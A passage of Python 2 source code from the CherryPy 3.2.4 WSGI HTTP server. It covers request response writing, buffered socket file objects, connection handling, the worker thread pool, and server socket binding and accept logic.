self.simple_response("501 Unimplemented")
self.close_connection = True
return False
# From PEP 333:
# "Servers and gateways that implement HTTP 1.1 must provide
# transparent support for HTTP 1.1's "expect/continue" mechanism.
# This may be done in any of several ways:
# 1. Respond to requests containing an Expect: 100-continue request
# with an immediate "100 Continue" response, and proceed normally.
# 2. Proceed with the request normally, but provide the application
# with a wsgi.input stream that will send the "100 Continue"
# response if/when the application first attempts to read from
# the input stream. The read request must then remain blocked
# until the client responds.
# 3. Wait until the client decides that the server does not support
# expect/continue, and sends the request body on its own.
# (This is suboptimal, and is not recommended.)
#
# We used to do 3, but are now doing 1. Maybe we'll do 2 someday,
# but it seems like it would be a big slowdown for such a rare case.
if self.inheaders.get("Expect", "") == "100-continue":
# Don't use simple_response here, because it emits headers
# we don't want. See http://www.cherrypy.org/ticket/951
msg = self.server.protocol + " 100 Continue\r\n\r\n"
try:
self.conn.wfile.sendall(msg)
except socket.error:
x = sys.exc_info()[1]
if x.args[0] not in socket_errors_to_ignore:
raise
return True
def parse_request_uri(self, uri):
"""Parse a Request-URI into (scheme, authority, path).
Note that Request-URI's must be one of::
Request-URI = "*" | absoluteURI | abs_path | authority
Therefore, a Request-URI which starts with a double forward-slash
cannot be a "net_path"::
net_path = "//" authority [ abs_path ]
Instead, it must be interpreted as an "abs_path" with an empty first
path segment::
abs_path = "/" path_segments
path_segments = segment *( "/" segment )
segment = *pchar *( ";" param )
param = *pchar
"""
if uri == ASTERISK:
return None, None, uri
i = uri.find('://')
if i > 0 and QUESTION_MARK not in uri[:i]:
# An absoluteURI.
# If there's a scheme (and it must be http or https), then:
# http_URL = "http:" "//" host [ ":" port ] [ abs_path [ "?" query ]]
scheme, remainder = uri[:i].lower(), uri[i + 3:]
authority, path = remainder.split(FORWARD_SLASH, 1)
path = FORWARD_SLASH + path
return scheme, authority, path
if uri.startswith(FORWARD_SLASH):
# An abs_path.
return None, None, uri
else:
# An authority.
return None, uri, None
def respond(self):
"""Call the gateway and write its iterable output."""
mrbs = self.server.max_request_body_size
if self.chunked_read:
self.rfile = ChunkedRFile(self.conn.rfile, mrbs)
else:
cl = int(self.inheaders.get("Content-Length", 0))
if mrbs and mrbs < cl:
if not self.sent_headers:
self.simple_response("413 Request Entity Too Large",
"The entity sent with the request exceeds the maximum "
"allowed bytes.")
return
self.rfile = KnownLengthRFile(self.conn.rfile, cl)
self.server.gateway(self).respond()
if (self.ready and not self.sent_headers):
self.sent_headers = True
self.send_headers()
if self.chunked_write:
self.conn.wfile.sendall("0\r\n\r\n")
def simple_response(self, status, msg=""):
"""Write a simple response back to the client."""
status = str(status)
buf = [self.server.protocol + SPACE +
status + CRLF,
"Content-Length: %s\r\n" % len(msg),
"Content-Type: text/plain\r\n"]
if status[:3] in ("413", "414"):
# Request Entity Too Large / Request-URI Too Long
self.close_connection = True
if self.response_protocol == 'HTTP/1.1':
# This will not be true for 414, since read_request_line
# usually raises 414 before reading the whole line, and we
# therefore cannot know the proper response_protocol.
buf.append("Connection: close\r\n")
else:
# HTTP/1.0 had no 413/414 status nor Connection header.
# Emit 400 instead and trust the message body is enough.
status = "400 Bad Request"
buf.append(CRLF)
if msg:
if isinstance(msg, unicodestr):
msg = msg.encode("ISO-8859-1")
buf.append(msg)
try:
self.conn.wfile.sendall("".join(buf))
except socket.error:
x = sys.exc_info()[1]
if x.args[0] not in socket_errors_to_ignore:
raise
def write(self, chunk):
"""Write unbuffered data to the client."""
if self.chunked_write and chunk:
buf = [hex(len(chunk))[2:], CRLF, chunk, CRLF]
self.conn.wfile.sendall(EMPTY.join(buf))
else:
self.conn.wfile.sendall(chunk)
def send_headers(self):
"""Assert, process, and send the HTTP response message-headers.
You must set self.status, and self.outheaders before calling this.
"""
hkeys = [key.lower() for key, value in self.outheaders]
status = int(self.status[:3])
if status == 413:
# Request Entity Too Large. Close conn to avoid garbage.
self.close_connection = True
elif "content-length" not in hkeys:
# "All 1xx (informational), 204 (no content),
# and 304 (not modified) responses MUST NOT
# include a message-body." So no point chunking.
if status < 200 or status in (204, 205, 304):
pass
else:
if (self.response_protocol == 'HTTP/1.1'
and self.method != 'HEAD'):
# Use the chunked transfer-coding
self.chunked_write = True
self.outheaders.append(("Transfer-Encoding", "chunked"))
else:
# Closing the conn is the only way to determine len.
self.close_connection = True
if "connection" not in hkeys:
if self.response_protocol == 'HTTP/1.1':
# Both server and client are HTTP/1.1 or better
if self.close_connection:
self.outheaders.append(("Connection", "close"))
else:
# Server and/or client are HTTP/1.0
if not self.close_connection:
self.outheaders.append(("Connection", "Keep-Alive"))
if (not self.close_connection) and (not self.chunked_read):
# Read any remaining request body data on the socket.
# "If an origin server receives a request that does not include an
# Expect request-header field with the "100-continue" expectation,
# the request includes a request body, and the server responds
# with a final status code before reading the entire request body
# from the transport connection, then the server SHOULD NOT close
# the transport connection until it has read the entire request,
# or until the client closes the connection. Otherwise, the client
# might not reliably receive the response message. However, this
# requirement is not be construed as preventing a server from
# defending itself against denial-of-service attacks, or from
# badly broken client implementations."
remaining = getattr(self.rfile, 'remaining', 0)
if remaining > 0:
self.rfile.read(remaining)
if "date" not in hkeys:
self.outheaders.append(("Date", rfc822.formatdate()))
if "server" not in hkeys:
self.outheaders.append(("Server", self.server.server_name))
buf = [self.server.protocol + SPACE + self.status + CRLF]
for k, v in self.outheaders:
buf.append(k + COLON + SPACE + v + CRLF)
buf.append(CRLF)
self.conn.wfile.sendall(EMPTY.join(buf))
class NoSSLError(Exception):
"""Exception raised when a client speaks HTTP to an HTTPS socket."""
pass
class FatalSSLAlert(Exception):
"""Exception raised when the SSL implementation signals a fatal alert."""
pass
class CP_fileobject(socket._fileobject):
"""Faux file object attached to a socket object."""
def __init__(self, *args, **kwargs):
self.bytes_read = 0
self.bytes_written = 0
socket._fileobject.__init__(self, *args, **kwargs)
def sendall(self, data):
"""Sendall for non-blocking sockets."""
while data:
try:
bytes_sent = self.send(data)
data = data[bytes_sent:]
except socket.error, e:
if e.args[0] not in socket_errors_nonblocking:
raise
def send(self, data):
bytes_sent = self._sock.send(data)
self.bytes_written += bytes_sent
return bytes_sent
def flush(self):
if self._wbuf:
buffer = "".join(self._wbuf)
self._wbuf = []
self.sendall(buffer)
def recv(self, size):
while True:
try:
data = self._sock.recv(size)
self.bytes_read += len(data)
return data
except socket.error, e:
if (e.args[0] not in socket_errors_nonblocking
and e.args[0] not in socket_error_eintr):
raise
if not _fileobject_uses_str_type:
def read(self, size=-1):
# Use max, disallow tiny reads in a loop as they are very inefficient.
# We never leave read() with any leftover data from a new recv() call
# in our internal buffer.
rbufsize = max(self._rbufsize, self.default_bufsize)
# Our use of StringIO rather than lists of string objects returned by
# recv() minimizes memory usage and fragmentation that occurs when
# rbufsize is large compared to the typical return value of recv().
buf = self._rbuf
buf.seek(0, 2) # seek end
if size < 0:
# Read until EOF
self._rbuf = StringIO.StringIO() # reset _rbuf. we consume it via buf.
while True:
data = self.recv(rbufsize)
if not data:
break
buf.write(data)
return buf.getvalue()
else:
# Read until size bytes or EOF seen, whichever comes first
buf_len = buf.tell()
if buf_len >= size:
# Already have size bytes in our buffer? Extract and return.
buf.seek(0)
rv = buf.read(size)
self._rbuf = StringIO.StringIO()
self._rbuf.write(buf.read())
return rv
self._rbuf = StringIO.StringIO() # reset _rbuf. we consume it via buf.
while True:
left = size - buf_len
# recv() will malloc the amount of memory given as its
# parameter even though it often returns much less data
# than that. The returned data string is short lived
# as we copy it into a StringIO and free it. This avoids
# fragmentation issues on many platforms.
data = self.recv(left)
if not data:
break
n = len(data)
if n == size and not buf_len:
# Shortcut. Avoid buffer data copies when:
# - We have no data in our buffer.
# AND
# - Our call to recv returned exactly the
# number of bytes we were asked to read.
return data
if n == left:
buf.write(data)
del data # explicit free
break
assert n <= left, "recv(%d) returned %d bytes" % (left, n)
buf.write(data)
buf_len += n
del data # explicit free
#assert buf_len == buf.tell()
return buf.getvalue()
def readline(self, size=-1):
buf = self._rbuf
buf.seek(0, 2) # seek end
if buf.tell() > 0:
# check if we already have it in our buffer
buf.seek(0)
bline = buf.readline(size)
if bline.endswith('\n') or len(bline) == size:
self._rbuf = StringIO.StringIO()
self._rbuf.write(buf.read())
return bline
del bline
if size < 0:
# Read until \n or EOF, whichever comes first
if self._rbufsize <= 1:
# Speed up unbuffered case
buf.seek(0)
buffers = [buf.read()]
self._rbuf = StringIO.StringIO() # reset _rbuf. we consume it via buf.
data = None
recv = self.recv
while data != "\n":
data = recv(1)
if not data:
break
buffers.append(data)
return "".join(buffers)
buf.seek(0, 2) # seek end
self._rbuf = StringIO.StringIO() # reset _rbuf. we consume it via buf.
while True:
data = self.recv(self._rbufsize)
if not data:
break
nl = data.find('\n')
if nl >= 0:
nl += 1
buf.write(data[:nl])
self._rbuf.write(data[nl:])
del data
break
buf.write(data)
return buf.getvalue()
else:
# Read until size bytes or \n or EOF seen, whichever comes first
buf.seek(0, 2) # seek end
buf_len = buf.tell()
if buf_len >= size:
buf.seek(0)
rv = buf.read(size)
self._rbuf = StringIO.StringIO()
self._rbuf.write(buf.read())
return rv
self._rbuf = StringIO.StringIO() # reset _rbuf. we consume it via buf.
while True:
data = self.recv(self._rbufsize)
if not data:
break
left = size - buf_len
# did we just receive a newline?
nl = data.find('\n', 0, left)
if nl >= 0:
nl += 1
# save the excess data to _rbuf
self._rbuf.write(data[nl:])
if buf_len:
buf.write(data[:nl])
break
else:
# Shortcut. Avoid data copy through buf when returning
# a substring of our first recv().
return data[:nl]
n = len(data)
if n == size and not buf_len:
# Shortcut. Avoid data copy through buf when
# returning exactly all of our first recv().
return data
if n >= left:
buf.write(data[:left])
self._rbuf.write(data[left:])
break
buf.write(data)
buf_len += n
#assert buf_len == buf.tell()
return buf.getvalue()
else:
def read(self, size=-1):
if size < 0:
# Read until EOF
buffers = [self._rbuf]
self._rbuf = ""
if self._rbufsize <= 1:
recv_size = self.default_bufsize
else:
recv_size = self._rbufsize
while True:
data = self.recv(recv_size)
if not data:
break
buffers.append(data)
return "".join(buffers)
else:
# Read until size bytes or EOF seen, whichever comes first
data = self._rbuf
buf_len = len(data)
if buf_len >= size:
self._rbuf = data[size:]
return data[:size]
buffers = []
if data:
buffers.append(data)
self._rbuf = ""
while True:
left = size - buf_len
recv_size = max(self._rbufsize, left)
data = self.recv(recv_size)
if not data:
break
buffers.append(data)
n = len(data)
if n >= left:
self._rbuf = data[left:]
buffers[-1] = data[:left]
break
buf_len += n
return "".join(buffers)
def readline(self, size=-1):
data = self._rbuf
if size < 0:
# Read until \n or EOF, whichever comes first
if self._rbufsize <= 1:
# Speed up unbuffered case
assert data == ""
buffers = []
while data != "\n":
data = self.recv(1)
if not data:
break
buffers.append(data)
return "".join(buffers)
nl = data.find('\n')
if nl >= 0:
nl += 1
self._rbuf = data[nl:]
return data[:nl]
buffers = []
if data:
buffers.append(data)
self._rbuf = ""
while True:
data = self.recv(self._rbufsize)
if not data:
break
buffers.append(data)
nl = data.find('\n')
if nl >= 0:
nl += 1
self._rbuf = data[nl:]
buffers[-1] = data[:nl]
break
return "".join(buffers)
else:
# Read until size bytes or \n or EOF seen, whichever comes first
nl = data.find('\n', 0, size)
if nl >= 0:
nl += 1
self._rbuf = data[nl:]
return data[:nl]
buf_len = len(data)
if buf_len >= size:
self._rbuf = data[size:]
return data[:size]
buffers = []
if data:
buffers.append(data)
self._rbuf = ""
while True:
data = self.recv(self._rbufsize)
if not data:
break
buffers.append(data)
left = size - buf_len
nl = data.find('\n', 0, left)
if nl >= 0:
nl += 1
self._rbuf = data[nl:]
buffers[-1] = data[:nl]
break
n = len(data)
if n >= left:
self._rbuf = data[left:]
buffers[-1] = data[:left]
break
buf_len += n
return "".join(buffers)
class HTTPConnection(object):
"""An HTTP connection (active socket).
server: the Server object which received this connection.
socket: the raw socket object (usually TCP) for this connection.
makefile: a fileobject class for reading from the socket.
"""
remote_addr = None
remote_port = None
ssl_env = None
rbufsize = DEFAULT_BUFFER_SIZE
wbufsize = DEFAULT_BUFFER_SIZE
RequestHandlerClass = HTTPRequest
def __init__(self, server, sock, makefile=CP_fileobject):
self.server = server
self.socket = sock
self.rfile = makefile(sock, "rb", self.rbufsize)
self.wfile = makefile(sock, "wb", self.wbufsize)
self.requests_seen = 0
def communicate(self):
"""Read each request and respond appropriately."""
request_seen = False
try:
while True:
# (re)set req to None so that if something goes wrong in
# the RequestHandlerClass constructor, the error doesn't
# get written to the previous request.
req = None
req = self.RequestHandlerClass(self.server, self)
# This order of operations should guarantee correct pipelining.
req.parse_request()
if self.server.stats['Enabled']:
self.requests_seen += 1
if not req.ready:
# Something went wrong in the parsing (and the server has
# probably already made a simple_response). Return and
# let the conn close.
return
request_seen = True
req.respond()
if req.close_connection:
return
except socket.error:
e = sys.exc_info()[1]
errnum = e.args[0]
# sadly SSL sockets return a different (longer) time out string
if errnum == 'timed out' or errnum == 'The read operation timed out':
# Don't error if we're between requests; only error
# if 1) no request has been started at all, or 2) we're
# in the middle of a request.
# See http://www.cherrypy.org/ticket/853
if (not request_seen) or (req and req.started_request):
# Don't bother writing the 408 if the response
# has already started being written.
if req and not req.sent_headers:
try:
req.simple_response("408 Request Timeout")
except FatalSSLAlert:
# Close the connection.
return
elif errnum not in socket_errors_to_ignore:
self.server.error_log("socket.error %s" % repr(errnum),
level=logging.WARNING, traceback=True)
if req and not req.sent_headers:
try:
req.simple_response("500 Internal Server Error")
except FatalSSLAlert:
# Close the connection.
return
return
except (KeyboardInterrupt, SystemExit):
raise
except FatalSSLAlert:
# Close the connection.
return
except NoSSLError:
if req and not req.sent_headers:
# Unwrap our wfile
self.wfile = CP_fileobject(self.socket._sock, "wb", self.wbufsize)
req.simple_response("400 Bad Request",
"The client sent a plain HTTP request, but "
"this server only speaks HTTPS on this port.")
self.linger = True
except Exception:
e = sys.exc_info()[1]
self.server.error_log(repr(e), level=logging.ERROR, traceback=True)
if req and not req.sent_headers:
try:
req.simple_response("500 Internal Server Error")
except FatalSSLAlert:
# Close the connection.
return
linger = False
def close(self):
"""Close the socket underlying this connection."""
self.rfile.close()
if not self.linger:
# Python's socket module does NOT call close on the kernel socket
# when you call socket.close(). We do so manually here because we
# want this server to send a FIN TCP segment immediately. Note this
# must be called *before* calling socket.close(), because the latter
# drops its reference to the kernel socket.
if hasattr(self.socket, '_sock'):
self.socket._sock.close()
self.socket.close()
else:
# On the other hand, sometimes we want to hang around for a bit
# to make sure the client has a chance to read our entire
# response. Skipping the close() calls here delays the FIN
# packet until the socket object is garbage-collected later.
# Someday, perhaps, we'll do the full lingering_close that
# Apache does, but not today.
pass
class TrueyZero(object):
"""An object which equals and does math like the integer '0' but evals True."""
def __add__(self, other):
return other
def __radd__(self, other):
return other
trueyzero = TrueyZero()
_SHUTDOWNREQUEST = None
class WorkerThread(threading.Thread):
"""Thread which continuously polls a Queue for Connection objects.
Due to the timing issues of polling a Queue, a WorkerThread does not
check its own 'ready' flag after it has started. To stop the thread,
it is necessary to stick a _SHUTDOWNREQUEST object onto the Queue
(one for each running WorkerThread).
"""
conn = None
"""The current connection pulled off the Queue, or None."""
server = None
"""The HTTP Server which spawned this thread, and which owns the
Queue and is placing active connections into it."""
ready = False
"""A simple flag for the calling server to know when this thread
has begun polling the Queue."""
def __init__(self, server):
self.ready = False
self.server = server
self.requests_seen = 0
self.bytes_read = 0
self.bytes_written = 0
self.start_time = None
self.work_time = 0
self.stats = {
'Requests': lambda s: self.requests_seen + ((self.start_time is None) and trueyzero or self.conn.requests_seen),
'Bytes Read': lambda s: self.bytes_read + ((self.start_time is None) and trueyzero or self.conn.rfile.bytes_read),
'Bytes Written': lambda s: self.bytes_written + ((self.start_time is None) and trueyzero or self.conn.wfile.bytes_written),
'Work Time': lambda s: self.work_time + ((self.start_time is None) and trueyzero or time.time() - self.start_time),
'Read Throughput': lambda s: s['Bytes Read'](s) / (s['Work Time'](s) or 1e-6),
'Write Throughput': lambda s: s['Bytes Written'](s) / (s['Work Time'](s) or 1e-6),
}
threading.Thread.__init__(self)
def run(self):
self.server.stats['Worker Threads'][self.getName()] = self.stats
try:
self.ready = True
while True:
conn = self.server.requests.get()
if conn is _SHUTDOWNREQUEST:
return
self.conn = conn
if self.server.stats['Enabled']:
self.start_time = time.time()
try:
conn.communicate()
finally:
conn.close()
if self.server.stats['Enabled']:
self.requests_seen += self.conn.requests_seen
self.bytes_read += self.conn.rfile.bytes_read
self.bytes_written += self.conn.wfile.bytes_written
self.work_time += time.time() - self.start_time
self.start_time = None
self.conn = None
except (KeyboardInterrupt, SystemExit):
exc = sys.exc_info()[1]
self.server.interrupt = exc
class ThreadPool(object):
"""A Request Queue for an HTTPServer which pools threads.
ThreadPool objects must provide min, get(), put(obj), start()
and stop(timeout) attributes.
"""
def __init__(self, server, min=10, max=-1):
self.server = server
self.min = min
self.max = max
self._threads = []
self._queue = queue.Queue()
self.get = self._queue.get
def start(self):
"""Start the pool of threads."""
for i in range(self.min):
self._threads.append(WorkerThread(self.server))
for worker in self._threads:
worker.setName("CP Server " + worker.getName())
worker.start()
for worker in self._threads:
while not worker.ready:
time.sleep(.1)
def _get_idle(self):
"""Number of worker threads which are idle. Read-only."""
return len([t for t in self._threads if t.conn is None])
idle = property(_get_idle, doc=_get_idle.__doc__)
def put(self, obj):
self._queue.put(obj)
if obj is _SHUTDOWNREQUEST:
return
def grow(self, amount):
"""Spawn new worker threads (not above self.max)."""
if self.max > 0:
budget = max(self.max - len(self._threads), 0)
else:
# self.max <= 0 indicates no maximum
budget = float('inf')
n_new = min(amount, budget)
workers = [self._spawn_worker() for i in range(n_new)]
while not self._all(operator.attrgetter('ready'), workers):
time.sleep(.1)
self._threads.extend(workers)
def _spawn_worker(self):
worker = WorkerThread(self.server)
worker.setName("CP Server " + worker.getName())
worker.start()
return worker
def _all(func, items):
results = [func(item) for item in items]
return reduce(operator.and_, results, True)
_all = staticmethod(_all)
def shrink(self, amount):
"""Kill off worker threads (not below self.min)."""
# Grow/shrink the pool if necessary.
# Remove any dead threads from our list
for t in self._threads:
if not t.isAlive():
self._threads.remove(t)
amount -= 1
# calculate the number of threads above the minimum
n_extra = max(len(self._threads) - self.min, 0)
# don't remove more than amount
n_to_remove = min(amount, n_extra)
# put shutdown requests on the queue equal to the number of threads
# to remove. As each request is processed by a worker, that worker
# will terminate and be culled from the list.
for n in range(n_to_remove):
self._queue.put(_SHUTDOWNREQUEST)
def stop(self, timeout=5):
# Must shut down threads here so the code that calls
# this method can know when all threads are stopped.
for worker in self._threads:
self._queue.put(_SHUTDOWNREQUEST)
# Don't join currentThread (when stop is called inside a request).
current = threading.currentThread()
if timeout and timeout >= 0:
endtime = time.time() + timeout
while self._threads:
worker = self._threads.pop()
if worker is not current and worker.isAlive():
try:
if timeout is None or timeout < 0:
worker.join()
else:
remaining_time = endtime - time.time()
if remaining_time > 0:
worker.join(remaining_time)
if worker.isAlive():
# We exhausted the timeout.
# Forcibly shut down the socket.
c = worker.conn
if c and not c.rfile.closed:
try:
c.socket.shutdown(socket.SHUT_RD)
except TypeError:
# pyOpenSSL sockets don't take an arg
c.socket.shutdown()
worker.join()
except (AssertionError,
# Ignore repeated Ctrl-C.
# See http://www.cherrypy.org/ticket/691.
KeyboardInterrupt):
pass
def _get_qsize(self):
return self._queue.qsize()
qsize = property(_get_qsize)
try:
import fcntl
except ImportError:
try:
from ctypes import windll, WinError
except ImportError:
def prevent_socket_inheritance(sock):
"""Dummy function, since neither fcntl nor ctypes are available."""
pass
else:
def prevent_socket_inheritance(sock):
"""Mark the given socket fd as non-inheritable (Windows)."""
if not windll.kernel32.SetHandleInformation(sock.fileno(), 1, 0):
raise WinError()
else:
def prevent_socket_inheritance(sock):
"""Mark the given socket fd as non-inheritable (POSIX)."""
fd = sock.fileno()
old_flags = fcntl.fcntl(fd, fcntl.F_GETFD)
fcntl.fcntl(fd, fcntl.F_SETFD, old_flags | fcntl.FD_CLOEXEC)
class SSLAdapter(object):
"""Base class for SSL driver library adapters.
Required methods:
* ``wrap(sock) -> (wrapped socket, ssl environ dict)``
* ``makefile(sock, mode='r', bufsize=DEFAULT_BUFFER_SIZE) -> socket file object``
"""
def __init__(self, certificate, private_key, certificate_chain=None):
self.certificate = certificate
self.private_key = private_key
self.certificate_chain = certificate_chain
def wrap(self, sock):
raise NotImplemented
def makefile(self, sock, mode='r', bufsize=DEFAULT_BUFFER_SIZE):
raise NotImplemented
class HTTPServer(object):
"""An HTTP server."""
_bind_addr = "127.0.0.1"
_interrupt = None
gateway = None
"""A Gateway instance."""
minthreads = None
"""The minimum number of worker threads to create (default 10)."""
maxthreads = None
"""The maximum number of worker threads to create (default -1 = no limit)."""
server_name = None
"""The name of the server; defaults to socket.gethostname()."""
protocol = "HTTP/1.1"
"""The version string to write in the Status-Line of all HTTP responses.
For example, "HTTP/1.1" is the default. This also limits the supported
features used in the response."""
request_queue_size = 5
"""The 'backlog' arg to socket.listen(); max queued connections (default 5)."""
shutdown_timeout = 5
"""The total time, in seconds, to wait for worker threads to cleanly exit."""
timeout = 10
"""The timeout in seconds for accepted connections (default 10)."""
version = "CherryPy/3.2.4"
"""A version string for the HTTPServer."""
software = None
"""The value to set for the SERVER_SOFTWARE entry in the WSGI environ.
If None, this defaults to ``'%s Server' % self.version``."""
ready = False
"""An internal flag which marks whether the socket is accepting connections."""
max_request_header_size = 0
"""The maximum size, in bytes, for request headers, or 0 for no limit."""
max_request_body_size = 0
"""The maximum size, in bytes, for request bodies, or 0 for no limit."""
nodelay = True
"""If True (the default since 3.1), sets the TCP_NODELAY socket option."""
ConnectionClass = HTTPConnection
"""The class to use for handling HTTP connections."""
ssl_adapter = None
"""An instance of SSLAdapter (or a subclass).
You must have the corresponding SSL driver library installed."""
def __init__(self, bind_addr, gateway, minthreads=10, maxthreads=-1,
server_name=None):
self.bind_addr = bind_addr
self.gateway = gateway
self.requests = ThreadPool(self, min=minthreads or 1, max=maxthreads)
if not server_name:
server_name = socket.gethostname()
self.server_name = server_name
self.clear_stats()
def clear_stats(self):
self._start_time = None
self._run_time = 0
self.stats = {
'Enabled': False,
'Bind Address': lambda s: repr(self.bind_addr),
'Run time': lambda s: (not s['Enabled']) and -1 or self.runtime(),
'Accepts': 0,
'Accepts/sec': lambda s: s['Accepts'] / self.runtime(),
'Queue': lambda s: getattr(self.requests, "qsize", None),
'Threads': lambda s: len(getattr(self.requests, "_threads", [])),
'Threads Idle': lambda s: getattr(self.requests, "idle", None),
'Socket Errors': 0,
'Requests': lambda s: (not s['Enabled']) and -1 or sum([w['Requests'](w) for w
in s['Worker Threads'].values()], 0),
'Bytes Read': lambda s: (not s['Enabled']) and -1 or sum([w['Bytes Read'](w) for w
in s['Worker Threads'].values()], 0),
'Bytes Written': lambda s: (not s['Enabled']) and -1 or sum([w['Bytes Written'](w) for w
in s['Worker Threads'].values()], 0),
'Work Time': lambda s: (not s['Enabled']) and -1 or sum([w['Work Time'](w) for w
in s['Worker Threads'].values()], 0),
'Read Throughput': lambda s: (not s['Enabled']) and -1 or sum(
[w['Bytes Read'](w) / (w['Work Time'](w) or 1e-6)
for w in s['Worker Threads'].values()], 0),
'Write Throughput': lambda s: (not s['Enabled']) and -1 or sum(
[w['Bytes Written'](w) / (w['Work Time'](w) or 1e-6)
for w in s['Worker Threads'].values()], 0),
'Worker Threads': {},
}
logging.statistics["CherryPy HTTPServer %d" % id(self)] = self.stats
def runtime(self):
if self._start_time is None:
return self._run_time
else:
return self._run_time + (time.time() - self._start_time)
def __str__(self):
return "%s.%s(%r)" % (self.__module__, self.__class__.__name__,
self.bind_addr)
def _get_bind_addr(self):
return self._bind_addr
def _set_bind_addr(self, value):
if isinstance(value, tuple) and value[0] in ('', None):
# Despite the socket module docs, using '' does not
# allow AI_PASSIVE to work. Passing None instead
# returns '0.0.0.0' like we want. In other words:
# host AI_PASSIVE result
# '' Y 192.168.x.y
# '' N 192.168.x.y
# None Y 0.0.0.0
# None N 127.0.0.1
# But since you can get the same effect with an explicit
# '0.0.0.0', we deny both the empty string and None as values.
raise ValueError("Host values of '' or None are not allowed. "
"Use '0.0.0.0' (IPv4) or '::' (IPv6) instead "
"to listen on all active interfaces.")
self._bind_addr = value
bind_addr = property(_get_bind_addr, _set_bind_addr,
doc="""The interface on which to listen for connections.
For TCP sockets, a (host, port) tuple. Host values may be any IPv4
or IPv6 address, or any valid hostname. The string 'localhost' is a
synonym for '127.0.0.1' (or '::1', if your hosts file prefers IPv6).
The string '0.0.0.0' is a special IPv4 entry meaning "any active
interface" (INADDR_ANY), and '::' is the similar IN6ADDR_ANY for
IPv6. The empty string or None are not allowed.
For UNIX sockets, supply the filename as a string.""")
def start(self):
"""Run the server forever."""
# We don't have to trap KeyboardInterrupt or SystemExit here,
# because cherrpy.server already does so, calling self.stop() for us.
# If you're using this server with another framework, you should
# trap those exceptions in whatever code block calls start().
self._interrupt = None
if self.software is None:
self.software = "%s Server" % self.version
# SSL backward compatibility
if (self.ssl_adapter is None and
getattr(self, 'ssl_certificate', None) and
getattr(self, 'ssl_private_key', None)):
warnings.warn(
"SSL attributes are deprecated in CherryPy 3.2, and will "
"be removed in CherryPy 3.3. Use an ssl_adapter attribute "
"instead.",
DeprecationWarning
)
try:
from cherrypy.wsgiserver.ssl_pyopenssl import pyOpenSSLAdapter
except ImportError:
pass
else:
self.ssl_adapter = pyOpenSSLAdapter(
self.ssl_certificate, self.ssl_private_key,
getattr(self, 'ssl_certificate_chain', None))
# Select the appropriate socket
if isinstance(self.bind_addr, basestring):
# AF_UNIX socket
# So we can reuse the socket...
try: os.unlink(self.bind_addr)
except: pass
# So everyone can access the socket...
try: os.chmod(self.bind_addr, 511) # 0777
except: pass
info = [(socket.AF_UNIX, socket.SOCK_STREAM, 0, "", self.bind_addr)]
else:
# AF_INET or AF_INET6 socket
# Get the correct address family for our host (allows IPv6 addresses)
host, port = self.bind_addr
try:
info = socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM, 0, socket.AI_PASSIVE)
except socket.gaierror:
if ':' in self.bind_addr[0]:
info = [(socket.AF_INET6, socket.SOCK_STREAM,
0, "", self.bind_addr + (0, 0))]
else:
info = [(socket.AF_INET, socket.SOCK_STREAM,
0, "", self.bind_addr)]
self.socket = None
msg = "No socket could be created"
for res in info:
af, socktype, proto, canonname, sa = res
try:
self.bind(af, socktype, proto)
except socket.error:
if self.socket:
self.socket.close()
self.socket = None
continue
break
if not self.socket:
raise socket.error(msg)
# Timeout so KeyboardInterrupt can be caught on Win32
self.socket.settimeout(1)
self.socket.listen(self.request_queue_size)
# Create worker threads
self.requests.start()
self.ready = True
self._start_time = time.time()
while self.ready:
try:
self.tick()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.error_log("Error in HTTPServer.tick", level=logging.ERROR,
traceback=True)
if self.interrupt:
while self.interrupt is True:
# Wait for self.stop() to complete. See _set_interrupt.
time.sleep(0.1)
if self.interrupt:
raise self.interrupt
def error_log(self, msg="", level=20, traceback=False):
# Override this in subclasses as desired
sys.stderr.write(msg + '\n')
sys.stderr.flush()
if traceback:
tblines = format_exc()
sys.stderr.write(tblines)
sys.stderr.flush()
def bind(self, family, type, proto=0):
"""Create (or recreate) the actual socket object."""
self.socket = socket.socket(family, type, proto)
prevent_socket_inheritance(self.socket)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if self.nodelay and not isinstance(self.bind_addr, str):
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if self.ssl_adapter is not None:
self.socket = self.ssl_adapter.bind(self.socket)
# If listening on the IPV6 any address ('::' = IN6ADDR_ANY),
# activate dual-stack. See http://www.cherrypy.org/ticket/871.
if (hasattr(socket, 'AF_INET6') and family == socket.AF_INET6
and self.bind_addr[0] in ('::', '::0', '::0.0.0.0')):
try:
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
except (AttributeError, socket.error):
# Apparently, the socket option is not available in
# this machine's TCP stack
pass
self.socket.bind(self.bind_addr)
def tick(self):
"""Accept a new connection and put it on the Queue."""
try:
s, addr = self.socket.accept()
if self.stats['Enabled']:
self.stats['Accepts'] += 1
if not self.ready:
return
prevent_socket_inheritance(s)
if hasattr(s, 'settimeout'):
s.settimeout(self.timeout)
makefile = CP_fileobject
ssl_env = {}
# if ssl cert and key are set, we try to be a secure HTTP server
if self.ssl_adapter is not None:
try:
s, ssl_env = self.ssl_adapter.wrap(s)
except NoSSLError:
msg = ("The client sent a plain HTTP request, but "
"this server only speaks HTTPS on this port.")
buf = ["%s 400 Bad Request\r\n" % self.protocol,
"Content-Length: %s\r\n" % len(msg),
"Content-Type: text/plain\r\n\r\n",
msg]
wfile = makefile(s, "wb", DEFAULT_BUFFER_SIZE)
try:
wfile.sendall("".join(buf))
except socket.error:
x = sys.exc_info()[1]
if x.args[0] not in socket_errors_to_ignore:
raise
return
if not s:
return
makefile = self.ssl_adapter.makefile
# Re-apply our timeout since we may have a new socket object
if hasattr(s, 'settimeout'):
s.settimeout(self.timeout)
conn = self.ConnectionClass(self, s, makefile)
if not isinstance(self.bind_addr, basestring):
# optional values
# Until we do DNS lookups, omit REMOTE_HOST
if addr is None: # sometimes this can happen
# figure out if AF_INET or AF_INET6.
if len(s.getsockname()) == 2:
# AF_INET
addr = ('0.0.0.0', 0)
else:
# AF_INET6
addr = ('::', 0)
conn.remote_addr = addr[0]
conn.remote_port = addr[1]
conn.ssl_env = ssl_env
self.requests.put(conn)
except socket.timeout:
# The only reason for the timeout in start() is so we can
# notice keyboard interrupts on Win32, which don't interrupt
# accept() by default
return
except socket.error:
x = sys.exc_info()[1]
if self.stats['Enabled']:
self.stats['Socket Errors'] += 1
if x.args[0] in socket_error_eintr:
